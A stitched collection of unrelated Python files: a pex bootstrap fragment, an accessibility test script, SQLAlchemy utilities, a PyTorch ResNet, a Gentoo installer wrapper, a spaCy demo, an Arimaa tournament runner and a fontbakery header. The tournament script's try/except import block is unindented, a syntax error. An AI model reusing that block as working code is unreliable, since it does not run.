                    """Construct a distribution for a pex file to the metadata directory.

                    :param name: A module name
                    :param prefix: Modules prefix
                    """
                    self._name = name
                    self._prefix = prefix

                def _match_file(self, name, filename):
                    # Returns `name` when it is a metadata entry of this
                    # distribution matching `filename` ("" matches the dir).
                    if re.match(
                        self.template.format(
                            path=os.path.join(self._prefix, self._name),
                            filename=filename,
                        ),
                        name,
                    ):
                        return name

                def read_text(self, filename):
                    if is_zipfile(sys.argv[0]):
                        zf = ZipFileWithPermissions(sys.argv[0])
                        for name in zf.namelist():
                            if name and self._match_file(name, filename):
                                return zf.read(name).decode(encoding="utf-8")
                read_text.__doc__ = Distribution.read_text.__doc__

                def _has_distribution(self):
                    if is_zipfile(sys.argv[0]):
                        zf = ZipFileWithPermissions(sys.argv[0])
                        for name in zf.namelist():
                            if name and self._match_file(name, ""):
                                return True

            if context.name in sys.modules:
                distribution = PexDistribution(context.name)
                if distribution._has_distribution():
                    yield distribution

    def get_code(self, fullname):
        module = self.load_module(fullname)
        return module.__loader__.get_code(fullname)
def add_module_dir_to_sys_path(dirname):
    """Register `dirname` (inside the pex) as an import location, if nonempty."""
    if not dirname:
        return
    # Keep the pex itself first on the path, then the module dir.
    sys.path = sys.path[:1] + [os.path.join(sys.path[0], dirname)] + sys.path[1:]
    sys.meta_path.insert(0, ModuleDirImport(dirname))
def pex_basepath(temp=False):
    """Base directory for pex extraction: a fresh temp dir, or the user cache."""
    if temp:
        import tempfile
        return tempfile.mkdtemp(dir=os.environ.get('TEMP_DIR'), prefix='pex_')
    return os.environ.get('PEX_CACHE_DIR', os.path.expanduser('~/.cache/pex'))
def pex_uniquedir():
    """Per-build extraction directory name, keyed by the build stamp."""
    return 'pex-%s' % PEX_STAMP
def pex_paths():
    """Resolve the extraction path components and whether caching is disabled."""
    env_flag = os.environ.get('PEX_NOCACHE')
    no_cache = env_flag and env_flag.lower() == 'true'
    basepath = pex_basepath(no_cache)
    uniquedir = pex_uniquedir()
    return os.path.join(basepath, uniquedir), basepath, uniquedir, no_cache
def explode_zip():
    """Extracts the current pex to a temp directory where we can import everything from.
    This is primarily used for binary extensions which can't be imported directly from
    inside a zipfile.
    """
    # Temporarily add bootstrap to sys path
    sys.path = [os.path.join(sys.path[0], '.bootstrap')] + sys.path[1:]
    import contextlib, portalocker
    sys.path = sys.path[1:]
    @contextlib.contextmanager
    def pex_lockfile(basepath, uniquedir):
        # Acquire the lockfile.
        lockfile_path = os.path.join(basepath, '.lock-%s' % uniquedir)
        lockfile = open(lockfile_path, "a+")
        # Block until we can acquire the lockfile.
        portalocker.lock(lockfile, portalocker.LOCK_EX)
        lockfile.seek(0)
        yield lockfile
        portalocker.lock(lockfile, portalocker.LOCK_UN)
    @contextlib.contextmanager
    def _explode_zip():
        # We need to update the actual variable; other modules are allowed to look at
        # these variables to find out what's going on (e.g. are we zip-safe or not).
        global PEX_PATH
        PEX_PATH, basepath, uniquedir, no_cache = pex_paths()
        makedirs(basepath, exist_ok=True)
        with pex_lockfile(basepath, uniquedir) as lockfile:
            # An empty lockfile means no previous invocation finished extracting.
            if len(lockfile.read()) == 0:
                import compileall, zipfile
                makedirs(PEX_PATH, exist_ok=True)
                with ZipFileWithPermissions(PEX, "r") as zf:
                    zf.extractall(PEX_PATH)
                if not no_cache:  # Don't bother optimizing; we're deleting this when we're done.
                    compileall.compile_dir(PEX_PATH, optimize=2, quiet=1)
                # Writing nonempty content to the lockfile will signal to subsequent invocations
                # that the cache has already been prepared.
                lockfile.write("pex unzip completed")
        # Import from the extracted tree instead of the zip itself.
        sys.path = [PEX_PATH] + [x for x in sys.path if x != PEX]
        yield
        if no_cache:
            import shutil
            shutil.rmtree(basepath)
    return _explode_zip
def profile(filename):
    """Returns a context manager to perform profiling while the program runs.

    This is triggered by setting the PEX_PROFILE_FILENAME env var to the
    destination file, at which point this will be invoked automatically at
    pex startup.
    """
    import contextlib, cProfile
    @contextlib.contextmanager
    def _profile():
        prof = cProfile.Profile()
        prof.enable()
        yield
        prof.disable()
        sys.stderr.write('Writing profiler output to %s\n' % filename)
        prof.dump_stats(filename)
    return _profile
# This must be redefined/implemented when the pex is built for debugging.
# The `DEBUG_PORT` environment variable should be used if the debugger is
# to be used as a server.
def start_debugger():
    """Build-time hook for launching a debugger; the default is a no-op."""
    pass
def main():
    """Runs the 'real' entry point of the pex.

    N.B. This gets redefined by pex_test_main to run tests instead.
    """
    # Give a build-injected debugger a chance to attach before user code runs.
    start_debugger()
    # run_name='__main__' so the target module's main-guard actually fires.
    runpy.run_module(ENTRY_POINT, run_name='__main__')
    return 0  # unless some other exception gets raised, we're successful.
|
#!/usr/bin/python
from macaroon.playback import *
import utils
# Scripted accessibility test: replay keystrokes against the
# "ToolStripProgressBar" sample and assert the braille/speech
# presentation produced at each step.
sequence = MacroSequence()
sequence.append(utils.StartRecordingAction())
sequence.append(WaitForWindowActivate("ToolStripProgressBar control",None))
sequence.append(utils.AssertPresentationAction(
    "button focus",
    ["BRAILLE LINE: 'ToolStripProgressBar Sample Frame'",
     " VISIBLE: 'ToolStripProgressBar Sample Fram', cursor=1",
     "BRAILLE LINE: 'button1 Button'",
     " VISIBLE: 'button1 Button', cursor=1",
     "SPEECH OUTPUT: 'ToolStripProgressBar Sample frame'",
     "SPEECH OUTPUT: ''",
     "SPEECH OUTPUT: 'button1 button'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Return"))
sequence.append(utils.AssertPresentationAction(
    "press enter to increase the value",
    [""]))
sequence.append(utils.StartRecordingAction())
# KP_9 drives flat review ("lndn" — line down — per the labels below).
sequence.append(KeyComboAction("KP_9"))
sequence.append(utils.AssertPresentationAction(
    "flatreview lndn to see the value",
    ["BRAILLE LINE: 'It is 20% of 100%'",
     " VISIBLE: 'It is 20% of 100%', cursor=1",
     "SPEECH OUTPUT: 'It is 20% of 100%'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_9"))
sequence.append(utils.AssertPresentationAction(
    "flatreview lndn to see the next line",
    ["BRAILLE LINE: 'Progress 20%'",
     " VISIBLE: 'Progress 20%', cursor=1",
     "SPEECH OUTPUT: 'progress bar 20 percent.'"]))
# Summarize the recorded assertions, then start playback.
sequence.append(utils.AssertionSummaryAction())
sequence.start()
|
# util/__init__.py
# Copyright (C) 2005-2018 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from .compat import callable, cmp, reduce, \
threading, py3k, py33, py36, py2k, jython, pypy, cpython, win32, \
pickle, dottedgetter, parse_qsl, namedtuple, next, reraise, \
raise_from_cause, text_type, safe_kwarg, string_types, int_types, \
binary_type, nested, \
quote_plus, with_metaclass, print_, itertools_filterfalse, u, ue, b,\
unquote_plus, unquote, b64decode, b64encode, byte_buffer, itertools_filter,\
iterbytes, StringIO, inspect_getargspec, zip_longest
from ._collections import KeyedTuple, ImmutableContainer, immutabledict, \
Properties, OrderedProperties, ImmutableProperties, OrderedDict, \
OrderedSet, IdentitySet, OrderedIdentitySet, column_set, \
column_dict, ordered_column_set, populate_column_dict, unique_list, \
UniqueAppender, PopulateDict, EMPTY_SET, to_list, to_set, \
to_column_set, update_copy, flatten_iterator, has_intersection, \
LRUCache, ScopedRegistry, ThreadLocalRegistry, WeakSequence, \
coerce_generator_arg, lightweight_named_tuple, collections_abc
from .langhelpers import iterate_attributes, class_hierarchy, \
portable_instancemethod, unbound_method_to_callable, \
getargspec_init, format_argspec_init, format_argspec_plus, \
get_func_kwargs, get_cls_kwargs, decorator, as_interface, \
memoized_property, memoized_instancemethod, md5_hex, \
group_expirable_memoized_property, dependencies, decode_slice, \
monkeypatch_proxied_specials, asbool, bool_or_str, coerce_kw_type,\
duck_type_collection, assert_arg_type, symbol, dictlike_iteritems,\
classproperty, set_creation_order, warn_exception, warn, NoneType,\
constructor_copy, methods_equivalent, chop_traceback, asint,\
generic_repr, counter, PluginLoader, hybridproperty, hybridmethod, \
safe_reraise,\
get_callable_argspec, only_once, attrsetter, ellipses_string, \
warn_limited, map_bits, MemoizedSlots, EnsureKWArgType, wrap_callable
from .deprecations import warn_deprecated, warn_pending_deprecation, \
deprecated, pending_deprecation, inject_docstring_text
# things that used to be not always available,
# but are now as of current support Python versions
from collections import defaultdict
from functools import partial
from functools import update_wrapper
from contextlib import contextmanager
|
"""resnet in pytorch
[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun.
Deep Residual Learning for Image Recognition
https://arxiv.org/abs/1512.03385v1
"""
import torch
import torch.nn as nn
class BasicBlock(nn.Module):
    """Basic residual block used by resnet-18 and resnet-34."""

    # BasicBlock and BottleNeck widen their output by different factors;
    # the class attribute `expansion` records that factor (1 here).
    expansion = 1

    def __init__(self, in_channels, out_channels, stride=1):
        super().__init__()
        # Main path: two 3x3 convolutions, each followed by batch norm,
        # with a ReLU between them.
        self.residual_function = nn.Sequential(
            nn.Conv2d(in_channels, out_channels, kernel_size=3,
                      stride=stride, padding=1, bias=False),
            nn.BatchNorm2d(out_channels),
            nn.ReLU(inplace=True),
            nn.Conv2d(out_channels, out_channels * BasicBlock.expansion,
                      kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(out_channels * BasicBlock.expansion),
        )
        # Identity shortcut by default; fall back to a 1x1 projection
        # whenever the spatial size or channel count changes.
        if stride == 1 and in_channels == BasicBlock.expansion * out_channels:
            self.shortcut = nn.Sequential()
        else:
            self.shortcut = nn.Sequential(
                nn.Conv2d(in_channels, out_channels * BasicBlock.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(out_channels * BasicBlock.expansion),
            )

    def forward(self, x):
        # Element-wise sum of both paths, then ReLU.
        combined = self.residual_function(x) + self.shortcut(x)
        return nn.ReLU(inplace=True)(combined)
class BottleNeck(nn.Module):
    """Bottleneck residual block used by resnets with over 50 layers."""

    # Output channel count is out_channels * expansion.
    expansion = 4

    def __init__(self, in_channels, out_channels, stride=1):
        super().__init__()
        widened = out_channels * BottleNeck.expansion
        # Main path: 1x1 reduce -> 3x3 -> 1x1 expand, each with batch norm.
        self.residual_function = nn.Sequential(
            nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False),
            nn.BatchNorm2d(out_channels),
            nn.ReLU(inplace=True),
            nn.Conv2d(out_channels, out_channels, stride=stride,
                      kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(out_channels),
            nn.ReLU(inplace=True),
            nn.Conv2d(out_channels, widened, kernel_size=1, bias=False),
            nn.BatchNorm2d(widened),
        )
        # Project the input with a 1x1 convolution when its shape no
        # longer matches the main path's output; otherwise identity.
        if stride != 1 or in_channels != widened:
            self.shortcut = nn.Sequential(
                nn.Conv2d(in_channels, widened, stride=stride,
                          kernel_size=1, bias=False),
                nn.BatchNorm2d(widened),
            )
        else:
            self.shortcut = nn.Sequential()

    def forward(self, x):
        combined = self.residual_function(x) + self.shortcut(x)
        return nn.ReLU(inplace=True)(combined)
class ResNet(nn.Module):
    """ResNet backbone with a one-scalar regression head.

    forward() runs the classifier fc layer, dropout, then fc_reg,
    and returns a tensor of shape (batch,) — one value per sample.
    """
    def __init__(self, block, num_block, num_classes=10):
        # block: residual block class (BasicBlock or BottleNeck)
        # num_block: blocks per stage, for conv2_x .. conv5_x
        # num_classes: width of the intermediate fc layer feeding fc_reg
        super().__init__()
        self.in_channels = 64
        self.conv1 = nn.Sequential(
            nn.Conv2d(3, 64, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(64),
            nn.ReLU(inplace=True))
        #we use a different inputsize than the original paper
        #so conv2_x's stride is 1
        self.conv2_x = self._make_layer(block, 64, num_block[0], 1)
        self.conv3_x = self._make_layer(block, 128, num_block[1], 2)
        self.conv4_x = self._make_layer(block, 256, num_block[2], 2)
        self.conv5_x = self._make_layer(block, 512, num_block[3], 2)
        self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))
        self.fc = nn.Linear(512 * block.expansion, num_classes)
        self.dp1 = nn.Dropout(0.25)
        # NOTE(review): dp2 is never used in forward(); kept to avoid
        # breaking saved state dicts — confirm before removing.
        self.dp2 = nn.Dropout(0.25)
        self.fc_reg = nn.Linear(num_classes, 1)
    def _make_layer(self, block, out_channels, num_blocks, stride):
        """Make one resnet stage (here "layer" means a stage of several
        residual blocks, not a single network layer).
        Args:
            block: block type, basic block or bottle neck block
            out_channels: output depth channel number of this layer
            num_blocks: how many blocks per layer
            stride: the stride of the first block of this layer
        Return:
            return a resnet layer
        """
        # we have num_block blocks per layer, the first block
        # could be 1 or 2, other blocks would always be 1
        strides = [stride] + [1] * (num_blocks - 1)
        layers = []
        for stride in strides:
            layers.append(block(self.in_channels, out_channels, stride))
            self.in_channels = out_channels * block.expansion
        return nn.Sequential(*layers)
    def forward(self, x):
        output = self.conv1(x)
        output = self.conv2_x(output)
        output = self.conv3_x(output)
        output = self.conv4_x(output)
        output = self.conv5_x(output)
        output = self.avg_pool(output)
        # Flatten to (batch, channels) before the fully connected head.
        output = output.contiguous().view(output.size(0), -1)
        output = self.fc(output)
        output = self.dp1(output)
        output = self.fc_reg(output)
        # Drop the trailing singleton dimension: final shape is (batch,).
        output = output.squeeze(1)
        return output
    def init_weights(self):
        """Kaiming-initialize conv/linear weights; constant-init batch norm."""
        for m in self.modules():
            if isinstance(m, nn.Linear):
                if m.weight is not None:
                    torch.nn.init.kaiming_normal_(m.weight.data)
                if m.bias is not None:
                    torch.nn.init.zeros_(m.bias.data)
            elif isinstance(m, nn.Conv2d):
                if m.weight is not None:
                    torch.nn.init.kaiming_normal_(m.weight.data)
                if m.bias is not None:
                    torch.nn.init.zeros_(m.bias.data)
            elif isinstance(m, nn.BatchNorm2d):
                if m.weight is not None:
                    torch.nn.init.constant_(m.weight.data,1.0)
                if m.bias is not None:
                    torch.nn.init.constant_(m.bias.data,0.0)
def resnet18(num_classes=10):
    """Return a ResNet-18 object.

    Args:
        num_classes: width of the intermediate classification layer
            (default 10, matching ResNet's own default), so this factory
            is configurable like resnet50 while staying call-compatible.
    """
    return ResNet(BasicBlock, [2, 2, 2, 2], num_classes)
def resnet34(num_classes=10):
    """Return a ResNet-34 object.

    Args:
        num_classes: width of the intermediate classification layer
            (default 10, matching ResNet's own default).
    """
    return ResNet(BasicBlock, [3, 4, 6, 3], num_classes)
def resnet50(nb_classes=10):
    """Return a ResNet-50 object.

    Args:
        nb_classes: width of the intermediate classification layer.
            Now defaults to 10 (ResNet's own default) so all the factory
            functions share the same calling convention; existing callers
            passing an explicit value are unaffected.
    """
    return ResNet(BottleNeck, [3, 4, 6, 3], nb_classes)
def resnet101(num_classes=10):
    """Return a ResNet-101 object.

    Args:
        num_classes: width of the intermediate classification layer
            (default 10, matching ResNet's own default).
    """
    return ResNet(BottleNeck, [3, 4, 23, 3], num_classes)
def resnet152(num_classes=10):
    """Return a ResNet-152 object.

    Args:
        num_classes: width of the intermediate classification layer
            (default 10, matching ResNet's own default).
    """
    return ResNet(BottleNeck, [3, 8, 36, 3], num_classes)
|
#!/usr/bin/env python3
import os
import pathlib
import sys
import click
import psutil
from .sendgentoo import install
@click.command()
@click.argument("device")
@click.option('--stdlib', is_flag=False, required=True, type=click.Choice(['glibc', 'musl', 'uclibc']))
@click.option("--hostname", type=str, required=True)
@click.option("--ip", type=str, required=True)
@click.option("--skip-to-chroot", is_flag=True)
@click.option("--verbose", is_flag=True)
@click.option("--debug", is_flag=True)
@click.pass_context
def sendgentoosimple(ctx,
                     device: str,
                     hostname: str,
                     ip: str,
                     stdlib: str,
                     skip_to_chroot: bool,
                     verbose: bool,
                     debug: bool,
                     ):
    """Install Gentoo on DEVICE with a fixed, simple layout (single ext4/gpt
    disk, no raid, no encryption), delegating the real work to install().

    Safety checks: must run inside tmux, as root, and — unless skipping
    straight to the chroot step — DEVICE must be an unmounted block device.
    """
    device = device.strip()
    if not os.getenv('TMUX'):
        print("Start a Tmux session first. Exiting.", file=sys.stderr)
        # sys.exit instead of quit(): quit() is an interactive-only helper
        # provided by the site module and may not exist under -S.
        sys.exit(1)
    if os.geteuid() != 0:
        print("you need to be root. Exiting.", file=sys.stderr)  # fixed typo "ned"
        sys.exit(1)
    if not skip_to_chroot:
        # Refuse to touch a device with any mounted partition.
        partitions = psutil.disk_partitions()
        for partition in partitions:
            if device in partition.device:
                print("device:", device, "was found:", partition.device, "mounted at:", partition.mountpoint, file=sys.stderr)
                print("Refusing to operate on mounted device. Exiting.", file=sys.stderr)
                sys.exit(1)
        if not pathlib.Path(device).is_block_device():
            print("device:", device, "is not a block device. Exiting.", file=sys.stderr)
            sys.exit(1)
    # NOTE(review): input() echoes the password to the terminal;
    # getpass.getpass() would be safer — confirm before changing UX.
    password = input("Enter new password: ")
    assert len(password) > 0
    ctx.invoke(install,
               root_devices=(device,),
               boot_device=device,
               boot_device_partition_table='gpt',
               root_device_partition_table='gpt',
               boot_filesystem='ext4',
               root_filesystem='ext4',
               stdlib=stdlib,
               raid='disk',
               raid_group_size='1',
               march='nocona',
               hostname=hostname,
               newpasswd=password,
               ip=ip,
               skip_to_chroot=skip_to_chroot,
               force=False,
               encrypt=False,
               multilib=False,
               verbose=verbose,
               debug=debug,)
|
# Demo of the Spacy NLP library
# Based on https://spacy.io/
# See also
# https://nlpforhackers.io/complete-guide-to-spacy/
import spacy
# Load both English models: the medium one ships with word vectors
# (used below for has_vector / vector_norm), the small one is used for
# the plain token-attribute walkthrough.
nlps = spacy.load('en_core_web_sm')
nlpm = spacy.load('en_core_web_md')
tokens = nlpm(u'dog cat banana afskfsd')
for token in tokens:
    print(token.text, token.has_vector, token.vector_norm, token.is_oov)
doc = nlps(u'Apple is looking at buying the U.K. startup FooCon for $1 billion.')
for token in doc:
    print(token.text, token.lemma_, token.pos_, token.tag_, token.dep_,
          token.shape_, token.is_alpha, token.is_stop)
"""
Apple apple PROPN NNP nsubj Xxxxx True False
is be VERB VBZ aux xx True True
looking look VERB VBG ROOT xxxx True False
at at ADP IN prep xx True True
buying buy VERB VBG pcomp xxxx True False
the the DET DT det xxx True True
U.K. u.k. PROPN NNP compound X.X. False False
startup startup NOUN NN dobj xxxx True False
FooCon foocon NOUN NN appos XxxXxx True False
for for ADP IN prep xxx True True
$ $ SYM $ quantmod $ False False
1 1 NUM CD compound d False False
billion billion NUM CD pobj xxxx True False
. . PUNCT . punct . False False
"""
# With the medium model, 'is' and 'at' are not flagged as stop words.
# This is a known bug.
# https://github.com/explosion/spaCy/issues/922
# Here is a fix: re-register the IS_STOP flag against the stop-word list.
nlpm.vocab.add_flag(lambda s: s.lower() in spacy.lang.en.stop_words.STOP_WORDS, spacy.attrs.IS_STOP)
doc = nlpm(u'Apple is looking at buying the U.K. startup FooCon for $1 billion.')
for token in doc:
    print(token.text, token.lemma_, token.pos_, token.tag_, token.dep_,
          token.shape_, token.is_alpha, token.is_stop)
corpus=[
    'Mary had a little lamb, little lamb, little lamb',
    'Mary had a little lamb',
    'Whose fleece was white as snow.',
    'And everywhere that Mary went',
    'Mary went, Mary went,',
    'Everywhere that Mary went',
    'The lamb was sure to go.'
]
corpus_tokenized = [nlpm(doc) for doc in corpus]
all_tokens = [token for doc in corpus_tokenized for token in doc]
# Build the vocabulary as the set of distinct token *strings*
# (Token objects themselves are not directly usable as set members here).
#vocab = set(all_tokens)
vocab = set()
for t in all_tokens:
    vocab.add(str(t))
|
#!/usr/bin/env python
# Copyright (c) 2009-2015 Brian Haskin Jr.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import print_function
import logging
import re
import socket
import sys
import time
from argparse import ArgumentParser
try:
from ConfigParser import SafeConfigParser, NoOptionError
ConfigParser = SafeConfigParser
except ModuleNotFoundError:
from configparser import ConfigParser, NoOptionError
xrange = range
from pyrimaa import aei
from pyrimaa.game import Game
from pyrimaa.util import TimeControl
log = logging.getLogger("roundrobin")
def run_bot(bot, config, global_options):
    """Launch the engine configured for *bot* and send it its options.

    Global options are applied first, then any "bot_"-prefixed options
    from the bot's own config section.
    """
    section = bot['name']
    cmdline = config.get(section, "cmdline")
    # Default to stdio when the section does not name a communication method.
    if config.has_option(section, "communication_method"):
        com_method = config.get(section, "communication_method").lower()
    else:
        com_method = "stdio"
    eng_com = aei.get_engine(com_method, cmdline, "roundrobin.aei")
    engine = aei.EngineController(eng_com)
    for option, value in global_options:
        engine.setoption(option, value)
    for name, value in config.items(section):
        if name.startswith("bot_"):
            engine.setoption(name[4:], value)
    return engine
def format_time(seconds):
    """Format a duration in seconds as a compact 'XhYmZs' string.

    Hours and minutes are omitted while they (and all larger units) are
    zero; seconds are always shown.
    """
    hrs = int(seconds / 3600)
    mins = int((seconds - hrs * 3600) / 60)
    secs = seconds - hrs * 3600 - mins * 60
    parts = []
    if hrs:
        parts.append("%dh" % hrs)
    if mins or parts:
        parts.append("%dm" % mins)
    parts.append("%ds" % secs)
    return "".join(parts)
def get_config(args=None):
    """Parse command line arguments and merge them with the config file.

    Command line values take precedence over the configuration file.
    The returned argparse namespace is augmented with the ConfigParser
    instance (``ini``), the set of bot section names (``bot_sections``)
    and the list of global "bot_" options (``global_options``).

    Returns the namespace on success, or 1 on a configuration error.
    """
    class NotSet:
        pass
    notset = NotSet()
    parser = ArgumentParser(
        description="Play engines in a round robin tournament.")
    parser.add_argument("--config",
                        default="roundrobin.cfg",
                        help="Configuration file to use")
    parser.add_argument("--log", help="Set log output level")
    parser.add_argument("--pgn", help="PGN results filename")
    parser.add_argument("-r", "--rounds",
                        type=int,
                        help="Number of rounds to run")
    parser.add_argument(
        "--stop-time",
        type=int,
        help="Number of seconds to leave when sending a bot a stop command")
    parser.add_argument(
        "--strict-setup",
        action="store_true",
        default=notset,
        help="Require the setup moves to be complete and legal")
    parser.add_argument(
        "--allow-setup",
        dest="strict_setup",
        action="store_false",
        help="Allow incomplete or otherwise illegal setup moves")
    parser.add_argument("--timecontrol", "--tc", help="Timecontrol to use")
    parser.add_argument("bots", nargs="*", help="Bots to use in tournament")
    args = parser.parse_args(args)
    config = ConfigParser()
    if config.read(args.config) != [args.config]:
        print("Could not open '%s'" % (args.config, ))
        return 1
    args.ini = config
    args.bot_sections = set(config.sections())
    if "global" not in args.bot_sections:
        print("Did not find expected 'global' section in configuration file.")
        return 1
    args.bot_sections.remove('global')
    try:
        loglevel = config.get("global", "loglevel")
    except NoOptionError:
        loglevel = None
    # Command line log level overrides the configuration file.
    loglevel = loglevel if args.log is None else args.log
    if loglevel is not None:
        loglevel = logging.getLevelName(loglevel)
        if not isinstance(loglevel, int):
            print("Bad log level %s, use ERROR, WARNING, INFO or DEBUG." % (
                loglevel,
            ))
            # Bail out: passing an unrecognized level on to basicConfig
            # would raise a ValueError after the friendly message.
            return 1
        logging.basicConfig(level=loglevel)
    if args.pgn is None:
        try:
            args.pgn = config.get("global", "pgn_filename")
        except NoOptionError:  # was a bare except; only a missing option is expected here
            pass
    if args.rounds is None:
        try:
            args.rounds = config.getint("global", "rounds")
        except NoOptionError:
            pass
    if args.timecontrol is None:
        try:
            args.timecontrol = config.get("global", "timecontrol")
        except NoOptionError:
            pass
    if args.strict_setup is notset:
        try:
            args.strict_setup = config.getboolean("global", "strict_setup")
        except NoOptionError:
            args.strict_setup = None
    if args.stop_time is None:
        try:
            args.stop_time = config.getint("global", "stop_time")
        except NoOptionError:
            pass
    if len(args.bots) == 0:
        try:
            args.bots = config.get("global", "bots").split()
        except NoOptionError:
            args.bots = args.bot_sections
    args.global_options = list()
    for option, value in config.items("global"):
        if option.startswith("bot_"):
            args.global_options.append((option[4:], value))
    return args
def main(args=None):
    """Run the round robin tournament described by the configuration.

    Each round pairs every bot against every other bot, giving the gold
    side to whichever bot has had it less often; optionally appends
    bayeselo-compatible results to a pgn file.

    Returns 0 on success, 1 on a configuration or I/O error.
    """
    cfg = get_config(args)
    if cfg.rounds:
        print("Number of rounds: %d" % (cfg.rounds, ))
    else:
        print("Number of rounds not specified, running 1 round.")
        cfg.rounds = 1
    try:
        # NOTE(review): cfg.timecontrol is an attribute, so a missing value
        # would surface as AttributeError (None.lower()), not NoOptionError
        # as the except below assumes — confirm against get_config.
        tctl_str = cfg.timecontrol
        if tctl_str.lower() == "none":
            timecontrol = None
        else:
            timecontrol = TimeControl(tctl_str)
            print("At timecontrol %s" % (tctl_str, ))
    except NoOptionError:
        timecontrol = None
    if cfg.global_options:
        print("Giving these settings to all bots:")
        for name, value in cfg.global_options:
            print(" %s: %s" % (name, value))
    print("Playing bots: ", end='')
    for bot in cfg.bots:
        print(bot, end=' ')
    print()
    # setup to write a bayeselo compatible pgn file
    write_pgn = False
    if cfg.pgn is not None:
        try:
            pgn_file = open(cfg.pgn, "a+")
        except IOError:
            print("Could not open pgn file %s" % (cfg.pgn, ))
            return 1
        print("Writing results to pgn file: %s" % (cfg.pgn, ))
        write_pgn = True
    # Build the per-bot record dicts (options, win/timeout counters,
    # gold-game count used for side balancing).
    bots = []
    for bname in cfg.bots:
        for bsection in cfg.bot_sections:
            if bname.lower() == bsection.lower():
                bot_options = []
                for name, value in cfg.ini.items(bsection):
                    if name.startswith("bot_"):
                        bot_options.append((name[4:], value))
                bot = {
                    'name': bsection,
                    'options': bot_options,
                    'gold': 0,
                    'wins': 0,
                    'timeouts': 0,
                    'reasons': dict()
                }
                # A per-bot timecontrol overrides the global one.
                if cfg.ini.has_option(bsection, "timecontrol"):
                    tctl_str = cfg.ini.get(bsection, "timecontrol")
                    if tctl_str.lower() == "none":
                        tc = None
                    else:
                        tc = TimeControl(tctl_str)
                    print("bot %s at timecontrol %s" % (bsection, tctl_str))
                    bot['timecontrol'] = tc
                bots.append(bot)
                break
        else:
            print("Did not find a bot section for %s" % (bname))
            return 1
    start_time = time.time()
    for round_num in xrange(cfg.rounds):
        for bot_ix, bot in enumerate(bots[:-1]):
            for opp in bots[bot_ix + 1:]:
                # Give gold to whichever bot has played gold less often.
                if bot['gold'] <= opp['gold']:
                    gbot = bot
                    sbot = opp
                else:
                    gbot = opp
                    sbot = bot
                gbot['gold'] += 1
                gengine = run_bot(gbot, cfg.ini, cfg.global_options)
                sengine = run_bot(sbot, cfg.ini, cfg.global_options)
                tc = [timecontrol, timecontrol]
                if 'timecontrol' in gbot:
                    tc[0] = gbot['timecontrol']
                if 'timecontrol' in sbot:
                    tc[1] = sbot['timecontrol']
                game = Game(gengine, sengine, tc,
                            strict_setup=cfg.strict_setup,
                            min_timeleft=cfg.stop_time)
                wside, reason = game.play()
                gengine.quit()
                sengine.quit()
                winner = [gbot, sbot][wside]
                loser = [gbot, sbot][wside ^ 1]
                # Display result of game
                print("%d%s" % (game.movenumber, "gs" [game.position.color]))
                print(game.position.board_to_str())
                print("%s beat %s because of %s playing side %s" % (
                    winner['name'], loser['name'], reason, "gs" [wside]
                ))
                # Record game result stats
                winner['wins'] += 1
                if reason == 't':
                    [gbot, sbot][wside ^ 1]['timeouts'] += 1
                winner['reasons'][reason] = winner['reasons'].get(reason, 0) + 1
                # write game result to pgn file
                if write_pgn:
                    ply_count = game.movenumber * 2
                    if game.position.color:
                        ply_count -= 1
                    else:
                        ply_count -= 2
                    results = ['1-0', '0-1']
                    pgn_file.write('[White "%s"]\n' % (gbot['name'], ))
                    pgn_file.write('[Black "%s"]\n' % (sbot['name'], ))
                    if timecontrol:
                        # NOTE(review): tctl_str may still hold the last
                        # per-bot timecontrol string from the setup loop,
                        # not the global one — verify intended.
                        pgn_file.write('[TimeControl "%s"]\n' % (tctl_str, ))
                    pgn_file.write('[PlyCount "%s"]\n' % (ply_count, ))
                    pgn_file.write('[ResultCode "%s"]\n' % (reason, ))
                    pgn_file.write('[Result "%s"]\n' % (results[wside], ))
                    pgn_file.write('\n')
                    for move in game.moves:
                        pgn_file.write('%s\n' % (move, ))
                    pgn_file.write('%s\n\n' % (results[wside]))
                    pgn_file.flush()
                # give the engines up to 30 more seconds to exit normally
                for i in range(30):
                    if (not gengine.is_running() and not sengine.is_running()):
                        break
                    time.sleep(1)
                gengine.cleanup()
                sengine.cleanup()
        round_end = time.time()
        total_time = round_end - start_time
        print("After round %d and %s:" % (round_num + 1,
                                          format_time(total_time)))
        for bot in bots:
            print("%s has %d wins and %d timeouts" % (bot['name'], bot['wins'],
                                                      bot['timeouts']))
            for name, value in bot['reasons'].items():
                print(" %d by %s" % (value, name))
    return 0
if __name__ == "__main__":
    # Run the tournament when invoked directly as a script.
    sys.exit(main())
|
import os
from fontbakery.callable import check
from fontbakery.status import ERROR, FAIL, INFO, PASS, WARN
from fontbakery.section import Section
from fontbakery.message import Message
# used to inform get_module_profile whether and how to create a profile
from fontbakery.fonts_profile import profile_factory # NOQA pylint: disable=unused-import
from .shared_conditions import is_variable_font
# Condition helpers (e.g. is_variable_font) pulled in when the profile loads.
